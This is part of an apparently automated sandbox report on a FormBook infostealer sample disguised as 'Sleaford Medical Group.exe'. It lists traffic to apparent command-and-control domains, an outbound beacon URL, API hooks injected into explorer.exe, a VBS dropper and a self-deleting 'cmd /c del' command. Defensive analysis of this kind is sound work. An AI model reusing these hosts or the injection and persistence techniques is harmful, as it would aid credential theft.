                                  Feb 25, 2021 15:45:22.216567993 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216583014 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216598034 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216615915 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216634989 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216643095 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216655016 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216666937 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216679096 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216691017 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216706991 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216722012 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216741085 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216758013 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.220082045 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:22.220118046 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:22.220153093 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:22.220187902 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:22.344394922 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.344424963 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.344440937 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.344460964 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.344479084 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.344495058 CET44349734159.203.144.58192.168.2.3

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Feb 25, 2021 15:42:59.665713072 CET5677753192.168.2.38.8.8.8
                                  Feb 25, 2021 15:42:59.714483976 CET53567778.8.8.8192.168.2.3
                                  Feb 25, 2021 15:42:59.747895002 CET5864353192.168.2.38.8.8.8
                                  Feb 25, 2021 15:42:59.796612024 CET53586438.8.8.8192.168.2.3
                                  Feb 25, 2021 15:42:59.926422119 CET6098553192.168.2.38.8.8.8
                                  Feb 25, 2021 15:42:59.983640909 CET53609858.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:01.094799995 CET5020053192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:01.152208090 CET53502008.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:02.056389093 CET5128153192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:02.105123997 CET53512818.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:03.347821951 CET4919953192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:03.406518936 CET53491998.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:05.362844944 CET5062053192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:05.423094988 CET53506208.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:09.599637032 CET6493853192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:09.648775101 CET53649388.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:10.500262976 CET6015253192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:10.551757097 CET53601528.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:11.549974918 CET5754453192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:11.598890066 CET53575448.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:12.713990927 CET5598453192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:12.762624979 CET53559848.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:13.728343010 CET6418553192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:13.776921034 CET53641858.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:15.741317034 CET6511053192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:15.792933941 CET53651108.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:16.899550915 CET5836153192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:16.948275089 CET53583618.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:17.790402889 CET6349253192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:17.840476036 CET53634928.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:29.933588982 CET6083153192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:29.985093117 CET53608318.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:31.979283094 CET6010053192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:32.036551952 CET53601008.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:34.518493891 CET5319553192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:34.579190016 CET53531958.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:45.906028032 CET5014153192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:45.957537889 CET53501418.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:46.964647055 CET5302353192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:47.021523952 CET53530238.8.8.8192.168.2.3
                                  Feb 25, 2021 15:43:54.866410017 CET4956353192.168.2.38.8.8.8
                                  Feb 25, 2021 15:43:54.915139914 CET53495638.8.8.8192.168.2.3
                                  Feb 25, 2021 15:44:03.891587019 CET5135253192.168.2.38.8.8.8
                                  Feb 25, 2021 15:44:03.943428993 CET53513528.8.8.8192.168.2.3
                                  Feb 25, 2021 15:44:05.724241972 CET5934953192.168.2.38.8.8.8
                                  Feb 25, 2021 15:44:05.776719093 CET53593498.8.8.8192.168.2.3
                                  Feb 25, 2021 15:44:06.648401976 CET5708453192.168.2.38.8.8.8
                                  Feb 25, 2021 15:44:06.697145939 CET53570848.8.8.8192.168.2.3
                                  Feb 25, 2021 15:44:11.729295015 CET5882353192.168.2.38.8.8.8
                                  Feb 25, 2021 15:44:11.778017044 CET53588238.8.8.8192.168.2.3
                                  Feb 25, 2021 15:44:44.154119015 CET5756853192.168.2.38.8.8.8
                                  Feb 25, 2021 15:44:44.203080893 CET53575688.8.8.8192.168.2.3
                                  Feb 25, 2021 15:44:56.863987923 CET5054053192.168.2.38.8.8.8
                                  Feb 25, 2021 15:44:56.922199965 CET53505408.8.8.8192.168.2.3
                                  Feb 25, 2021 15:45:17.204905987 CET5436653192.168.2.38.8.8.8
                                  Feb 25, 2021 15:45:17.279130936 CET53543668.8.8.8192.168.2.3
                                  Feb 25, 2021 15:45:20.969799042 CET5303453192.168.2.38.8.8.8
                                  Feb 25, 2021 15:45:21.144277096 CET53530348.8.8.8192.168.2.3
                                  Feb 25, 2021 15:46:01.225702047 CET5776253192.168.2.38.8.8.8
                                  Feb 25, 2021 15:46:01.286142111 CET53577628.8.8.8192.168.2.3
                                  Feb 25, 2021 15:46:03.266912937 CET5543553192.168.2.38.8.8.8
                                  Feb 25, 2021 15:46:03.328434944 CET53554358.8.8.8192.168.2.3
                                  Feb 25, 2021 15:46:03.989600897 CET5071353192.168.2.38.8.8.8
                                  Feb 25, 2021 15:46:04.052900076 CET53507138.8.8.8192.168.2.3
                                  Feb 25, 2021 15:46:04.553440094 CET5613253192.168.2.38.8.8.8
                                  Feb 25, 2021 15:46:04.613538027 CET53561328.8.8.8192.168.2.3
                                  Feb 25, 2021 15:46:05.365631104 CET5898753192.168.2.38.8.8.8
                                  Feb 25, 2021 15:46:05.425745010 CET53589878.8.8.8192.168.2.3
                                  Feb 25, 2021 15:46:06.025368929 CET5657953192.168.2.38.8.8.8
                                  Feb 25, 2021 15:46:06.101105928 CET53565798.8.8.8192.168.2.3
                                  Feb 25, 2021 15:46:06.698834896 CET6063353192.168.2.38.8.8.8
                                  Feb 25, 2021 15:46:06.758333921 CET53606338.8.8.8192.168.2.3
                                  Feb 25, 2021 15:46:10.732311964 CET6129253192.168.2.38.8.8.8
                                  Feb 25, 2021 15:46:10.794365883 CET53612928.8.8.8192.168.2.3
                                  Feb 25, 2021 15:46:15.136203051 CET6361953192.168.2.38.8.8.8
                                  Feb 25, 2021 15:46:15.193792105 CET53636198.8.8.8192.168.2.3
                                  Feb 25, 2021 15:46:15.676244020 CET6493853192.168.2.38.8.8.8
                                  Feb 25, 2021 15:46:15.725150108 CET53649388.8.8.8192.168.2.3
                                  Feb 25, 2021 15:46:58.401931047 CET6194653192.168.2.38.8.8.8
                                  Feb 25, 2021 15:46:58.466870070 CET53619468.8.8.8192.168.2.3
                                  Feb 25, 2021 15:47:18.723651886 CET6491053192.168.2.38.8.8.8
                                  Feb 25, 2021 15:47:18.785362005 CET53649108.8.8.8192.168.2.3

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Feb 25, 2021 15:45:20.969799042 CET192.168.2.38.8.8.80x1fc9Standard query (0)01677937777.burrow.ioA (IP address)IN (0x0001)
                                  Feb 25, 2021 15:46:58.401931047 CET192.168.2.38.8.8.80x7d8Standard query (0)www.landingberg.comA (IP address)IN (0x0001)
                                  Feb 25, 2021 15:47:18.723651886 CET192.168.2.38.8.8.80xe5dfStandard query (0)www.waymakers.siteA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Feb 25, 2021 15:45:21.144277096 CET8.8.8.8192.168.2.30x1fc9No error (0)01677937777.burrow.io159.203.144.58A (IP address)IN (0x0001)
                                  Feb 25, 2021 15:46:58.466870070 CET8.8.8.8192.168.2.30x7d8No error (0)www.landingberg.com104.21.89.82A (IP address)IN (0x0001)
                                  Feb 25, 2021 15:46:58.466870070 CET8.8.8.8192.168.2.30x7d8No error (0)www.landingberg.com172.67.139.17A (IP address)IN (0x0001)
                                  Feb 25, 2021 15:47:18.785362005 CET8.8.8.8192.168.2.30xe5dfNo error (0)www.waymakers.sitewaymakers.siteCNAME (Canonical name)IN (0x0001)
                                  Feb 25, 2021 15:47:18.785362005 CET8.8.8.8192.168.2.30xe5dfNo error (0)waymakers.site184.168.131.241A (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • www.landingberg.com

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.349745104.21.89.8280C:\Windows\explorer.exe
                                  TimestampkBytes transferredDirectionData
                                  Feb 25, 2021 15:46:58.520201921 CET6676OUTGET /twy/?pPX=elx0UibK+4/Nbm+qsvCMZ/KEfRavAHzyccJHHIU1h6WwAO+M5fT0/YOmYv0X1fYwTcwa&Hp=V6AHd0O0h HTTP/1.1
                                  Host: www.landingberg.com
                                  Connection: close
                                  Data Raw: 00 00 00 00 00 00 00
                                  Data Ascii:
                                  Feb 25, 2021 15:46:58.573807001 CET6677INHTTP/1.1 301 Moved Permanently
                                  Date: Thu, 25 Feb 2021 14:46:58 GMT
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Cache-Control: max-age=3600
                                  Expires: Thu, 25 Feb 2021 15:46:58 GMT
                                  Location: https://www.landingberg.com/twy/?pPX=elx0UibK+4/Nbm+qsvCMZ/KEfRavAHzyccJHHIU1h6WwAO+M5fT0/YOmYv0X1fYwTcwa&Hp=V6AHd0O0h
                                  cf-request-id: 087b4158f70000d6ed28399000000001
                                  Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=lOW1mDZ3VLduUYysi%2Fbkr3ycvbtlPQ652FKCtAUaOCAAN%2B2q2oGXGJvs1BwEslGo0a8Wil2bBIdhx85ViTCefAacb%2BPKpnNUViCz91K6zSnYXosj"}],"max_age":604800}
                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 62723807f806d6ed-FRA
                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  HTTPS Packets

                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                  Feb 25, 2021 15:45:21.440952063 CET159.203.144.58443192.168.2.349734CN=burrow.io CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Jan 08 10:05:33 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu Apr 08 11:05:33 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                  Code Manipulations

                                  User Modules

                                  Hook Summary

                                  Function NameHook TypeActive in Processes
                                  PeekMessageAINLINEexplorer.exe
                                  PeekMessageWINLINEexplorer.exe
                                  GetMessageWINLINEexplorer.exe
                                  GetMessageAINLINEexplorer.exe

                                  Processes

                                  Process: explorer.exe, Module: user32.dll
                                  Function NameHook TypeNew Data
                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEB
                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEB
                                  GetMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEB
                                  GetMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEB

                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  Analysis Process: Sleaford Medical Group.exe PID: 2412 Parent PID: 5604

                                  General

                                  Start time:15:43:07
                                  Start date:25/02/2021
                                  Path:C:\Users\user\Desktop\Sleaford Medical Group.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\Desktop\Sleaford Medical Group.exe'
                                  Imagebase:0x400000
                                  File size:106496 bytes
                                  MD5 hash:DDE7E39D025B75849184C077517030AE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Visual Basic
                                  Reputation:low

                                  Analysis Process: Sleaford Medical Group.exe PID: 5356 Parent PID: 2412

                                  General

                                  Start time:15:45:04
                                  Start date:25/02/2021
                                  Path:C:\Users\user\Desktop\Sleaford Medical Group.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\Desktop\Sleaford Medical Group.exe'
                                  Imagebase:0x400000
                                  File size:106496 bytes
                                  MD5 hash:DDE7E39D025B75849184C077517030AE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low

                                  Analysis Process: explorer.exe PID: 3388 Parent PID: 5356

                                  General

                                  Start time:15:45:24
                                  Start date:25/02/2021
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:
                                  Imagebase:0x7ff714890000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Analysis Process: wscript.exe PID: 5616 Parent PID: 3388

                                  General

                                  Start time:15:45:28
                                  Start date:25/02/2021
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs'
                                  Imagebase:0x7ff7cdf60000
                                  File size:163840 bytes
                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Analysis Process: oversad.exe PID: 6316 Parent PID: 5616

                                  General

                                  Start time:15:45:30
                                  Start date:25/02/2021
                                  Path:C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe
                                  Imagebase:0x400000
                                  File size:106496 bytes
                                  MD5 hash:DDE7E39D025B75849184C077517030AE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Visual Basic
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 11%, ReversingLabs
                                  Reputation:low

                                  Analysis Process: help.exe PID: 6328 Parent PID: 3388

                                  General

                                  Start time:15:45:44
                                  Start date:25/02/2021
                                  Path:C:\Windows\SysWOW64\help.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\help.exe
                                  Imagebase:0xe60000
                                  File size:10240 bytes
                                  MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001C.00000002.731169512.000000000333D000.00000004.00000020.sdmp, Author: Florian Roth
                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001C.00000002.736741312.0000000003CCF000.00000004.00000001.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:moderate

                                  Analysis Process: cmd.exe PID: 6472 Parent PID: 6328

                                  General

                                  Start time:15:45:53
                                  Start date:25/02/2021
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:/c del 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
                                  Imagebase:0xac0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Analysis Process: conhost.exe PID: 4880 Parent PID: 6472

                                  General

                                  Start time:15:45:54
                                  Start date:25/02/2021
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6b2800000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Disassembly

                                  Code Analysis

                                  Reset < >